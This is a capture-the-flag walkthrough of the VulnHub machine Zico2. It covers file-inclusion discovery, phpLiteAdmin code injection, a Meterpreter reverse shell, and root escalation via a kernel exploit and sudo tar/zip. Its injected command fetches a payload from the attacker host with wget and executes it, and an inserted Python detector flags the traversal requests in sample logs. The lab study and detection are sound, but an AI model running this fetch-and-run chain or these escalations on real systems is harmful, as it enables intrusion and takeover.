Thursday, December 13, 2018

Zico 2

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.

- Zico2 can be downloaded from here:

https://www.vulnhub.com/entry/zico2-1,210/


- Once downloaded and imported into VMware:

2 - ENUMERATION

- Looking for zico2's IP:

- Scanning with Nmap:

- Dirbusting the web server, we find an interesting folder, dbadmin:

- Running dirsearch.py, we also discover view.php:

- Let's explore both view.php and /dbadmin.

- Connecting to the web server:

- Scrolling down and clicking the "tools" links:

- So view.php invites us to try a Local File Inclusion (LFI) through directory path traversal:

- Now it's time to explore dbadmin:

- Clicking test_db.php:

- The default password for phpLiteAdmin is admin:

https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/

- It is possible to create new databases:

3 - EXPLOITATION - REMOTE PHP CODE INJECTION

- Searching for phpLiteAdmin vulnerabilities, we find an exploit for Remote PHP Code Injection, which allows code to be injected into the server remotely:

- Reading the first lines of the 24044.txt exploit:

- Going to exploit-db:

- Following the exploit's instructions, let's create hack.php:

- Adding a test table named prueba:

- Entering the Default Value <?php phpinfo()?>:

- Using the LFI in view.php, we can include the newly created database file and confirm that the exploit works:


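Both steps above (the traversal through view.php and the inclusion of the phpLiteAdmin database file under /usr/databases) leave traces in the web server's access log. The following detector is an added example, not code from the original write-up; it assumes view.php takes the included file in a `page` parameter (the parameter name is not shown above) and runs over constructed Apache log lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample entries in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
192.168.1.19 - - [13/Dec/2018:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.19 - - [13/Dec/2018:10:01:09 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.1.19 - - [13/Dec/2018:10:02:31 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.19 - - [13/Dec/2018:10:03:05 +0000] "GET /view.php?page=..%2F..%2F..%2Fusr%2Fdatabases%2Fhack.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.168.1.19 - - [13/Dec/2018:10:03:40 +0000] "GET /dbadmin/test_db.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# ".." as a whole path component, after backslashes have been normalised to "/".
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (ip, target, reason) for a suspicious request, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    for key, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw).replace("\\", "/")
        if TRAVERSAL_RE.search(value):
            return (m.group("ip"), target, f"path traversal in parameter '{key}'")
        if value.startswith("/") or value.endswith((".php", ".db", ".sqlite")):
            return (m.group("ip"), target, f"absolute path or script/database file in parameter '{key}'")
    return None

def scan(log_text):
    """Scan every line of an access log and return the list of findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, target, reason in scan(SAMPLE_LOG):
        print(f"{ip} {target} -> {reason}")
```

Feeding the real access log (or a tail of it) into scan() flags the traversal requests while leaving the normal tools.html view untouched.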
- Why not take advantage of this Remote PHP Code Injection to upload a payload and spawn a reverse shell?

- msfvenom helps us create our payload:

- Giving it execute permissions:

- Setting up a Meterpreter handler:

- Creating table 1 in database /usr/databases/hack.php:

- Now let's analyze in detail the Default Value to be entered in Field 1:

  • system() -> executes an external program and displays its output
  • cd /tmp -> changes to the writable folder /tmp
  • wget http://192.168.1.19:8000/myshell -> transfers the payload from Kali to Zico2
  • chmod 755 -> gives the payload execute permissions
  • ./myshell -> runs the payload

- The LFI in view.php helps us run the exploit remotely:

- As a result, a Meterpreter session is obtained:

- Getting a shell:

4 - PRIVILEGE ESCALATION

- Improving the shell:

- Let's explore two ways for Privilege Escalation:

4.1 - Kernel exploitation

- The kernel is vulnerable to this exploit, which allows Local Privilege Escalation:

www.exploit-db.com/exploits/33589

- Copy-pasting the C program vnik.c to our local Kali machine:

- Transferring vnik.c from Kali to Zico2:

- Compiling vnik.c according to the instructions:

- Running vnik, a root shell is obtained:

4.2 - Abusing tar and zip

- Listing /home/zico:

- Going to /wordpress:

- Reading wp-config.php, we discover interesting credentials for user zico:

- Using these credentials:

- zico is a sudoer able to run /bin/tar and /usr/bin/zip as root:

- tar and zip can run external commands supplied on the command line, which can be abused for Privilege Escalation:

http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/

https://www.gnu.org/software/tar/manual/html_section/tar_29.html

- For instance, tar can be used to spawn a root shell in this way:

- In a similar way zip can be used to spawn a root shell:

5 - CAPTURING THE FLAG

- Inside the /root folder we can read the file flag.txt: